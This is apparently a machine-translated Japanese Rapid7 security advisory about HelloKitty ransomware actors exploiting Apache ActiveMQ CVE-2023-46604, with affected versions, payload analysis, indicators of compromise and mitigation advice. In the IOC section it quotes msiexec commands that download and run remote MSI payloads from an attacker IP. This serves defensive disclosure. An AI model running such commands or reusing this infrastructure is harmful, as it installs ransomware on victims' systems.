CVE-2023-46604: Apache ActiveMQ の悪用の疑い

身代金要求のメモと入手可能な証拠から、10月初旬にフォーラムでソースコードがリークされたHelloKittyランサムウェアファミリーの活動であると考えられます。Rapid7は、被害を受けた顧客環境全体で同様の侵害の兆候を観察しており、いずれも古いバージョンのApache ActiveMQを実行していました。

CVE-2023-46604 は、Apache ActiveMQ におけるリモート・コード実行の脆弱性で、ブローカーにネットワーク・アクセスできるリモートの攻撃者が、"OpenWire プロトコルでシリアライズされたクラス・タイプを操作することで、任意のシェル・コマンドを実行し、ブローカーにクラスパス上の任意のクラスをインスタンス化させることができる" というものです。これは、私たちがこれまで見てきた脆弱性の説明の中でも、より複雑なものの1つですが、問題の根本的な原因は、安全でないデシリアライゼーションです。

Apacheはこの脆弱性を公表し、2023年10月25日にActiveMQの新バージョンをリリースしました。概念実証（Proof-of-Concept）のエクスプロイトコードと脆弱性の詳細はいずれも公開されています。Rapid7の脆弱性調査チームは公開されているPoCをテストし、顧客環境でMDRが観察した挙動がCVE-2023-46604の悪用から予想されるものと類似していることを確認しました。Rapid7のリサーチでは、AttackerKBで脆弱性の技術的な分析を行っています。

対象製品

Apacheの勧告によると、CVE-2023-46604は以下に影響する：

• 5.18.3 以前の Apache ActiveMQ 5.18.0
• 5.17.6 以前の Apache ActiveMQ 5.17.0
• 5.16.7 以前の Apache ActiveMQ 5.16.0
• 5.15.16 以前の Apache ActiveMQ
• Apache ActiveMQ レガシー OpenWire モジュール 5.18.0 5.18.3 以前
• Apache ActiveMQ レガシー OpenWire モジュール 5.17.0 5.17.6 以前
• Apache ActiveMQ レガシー OpenWire モジュール 5.16.0 5.16.7 以前
• Apache ActiveMQ レガシー OpenWire モジュール 5.8.0 5.15.16 以前

観察された攻撃者の行動

脆弱性の悪用に成功すると、Java.exeに標的となる特定のApacheアプリケーションが含まれるようになります。この場合、両方のインシデントで親プロセスとして観測された" D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64," を含みます。侵入後、攻撃者はMSIExecを使用してM2.pngおよびM4.pngという名前のリモートバイナリをロードしようとしました。Rapid7が観測したインシデントの1つでは、アセットを暗号化する試みが半分以上失敗していました。

HelloKitty ランサムウェアの詳細

Rapid7は、ドメイン172.245.16[.]125からM4.pngとM2.pngのMSIファイルを取得し、制御された環境で分析しました。分析後、Rapid7は両方のMSIファイルに内部的にdllloaderという名前の32ビット.NET実行可能ファイルが含まれていることを確認しました。.NET実行可能ファイルdllloaderの中で、Rapid7は実行可能ファイルがBase64エンコードされたペイロードをロードすることを発見しました。我々はBase64エンコードされたペイロードをデコードし、それがEncDLLという名前の32ビット.NET DLLであることを突き止めました。

EncDLLバイナリはランサムウェアと同様の機能を含んでおり、DLLは特定のプロセスを検索し、その実行を停止します。Rapid7は、DLLがRSACryptoServiceProvider関数を使用して特定のファイル拡張子を暗号化し、暗号化されたファイルに拡張子.lockedを付加することを確認しました。また、暗号化を回避するディレクトリに関する情報を提供する別の関数、ランサムウェアの注意書きが割り当てられた静的変数、HTTPサーバー172.245.16[.]125への通信を試みる関数も確認されました。

ランサムウェアの注意書きには、通信は電子メールアドレスservice@hellokittycat[.]onlineを通じて行われるべきであると書かれていた。

妥協の指標

Rapid7 の脆弱性調査チームは、CVE-2023-46604 と公開されている悪用コードを分析しました。私たちのテストセットアップでは、activemq.logにCVE-2023-46604の悪用に成功したことを示す1行のエントリがありました：

2023-10-31 05:04:58,736 | WARN | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616

上記の例では、攻撃者（つまり研究者）のIPは192.168.86.35で、ターゲットのTCPポートは61616であった。変更可能なロギング設定によっては、より多くの、あるいはより少ない情報が得られるかもしれない。

その他のIOC

• http://172.245.16[.]125/m2.png
• http://172.245.16[.]125/m4.png

Files dropped and executed via the msiexec command:

• cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
• cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"

以下のファイルのハッシュは、ドメイン172.245.16[.]125からダウンロードされた2つのMSIパッケージの一部でした：

• M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
• M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
• dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7 EncDll:C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
• 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C

緩和ガイダンス

各組織は、できるだけ早くActiveMQの修正バージョンにアップデートし、各自の環境で侵害の兆候を探す必要があります。Apacheが提供するアップデートはここで入手できます。また、Apacheは、ActiveMQ実装のセキュリティを向上させるための情報を提供しています。

Rapid7のお客様

Rapid7 MDR、InsightIDR、および Managed Threat Complete (MTC) をご利用のお客様は、以下のルールが導入されており、この脅威に関連するエクスプロイト後のアクティビティについてアラートを発しています。Rapid7は、顧客の環境内の該当するすべてのアセットにInsight Agentが導入されていることを確認することを推奨します：

• 不審なプロセス - Apache ActiveMQ が CMD プロセスを起動する
• 攻撃者のテクニック - MSIExecがHTTP経由でオブジェクトをロードする
• 不審なプロセス - ボリュームシャドウサービスによるシャドウコピーの削除

InsightVMおよびNexposeのお客様は、本日11月1日（水）にリリースされるWindows用の認証済み脆弱性チェックにより、CVE-2023-46604への暴露を評価することができます。

トム・エルキンス、ジョン・フェニンガー、エヴァン・マッキャン、マシュー・スミス、マイカ・ヤングの各氏が、このブログに攻撃者の行動に関する洞察を寄稿してくれました。

※本ブログは英語版ブログ "Suspected Exploitation of Apache ActiveMQ CVE-2023-46604" の機械翻訳版です。最新情報等につきましては、原文をご参照ください。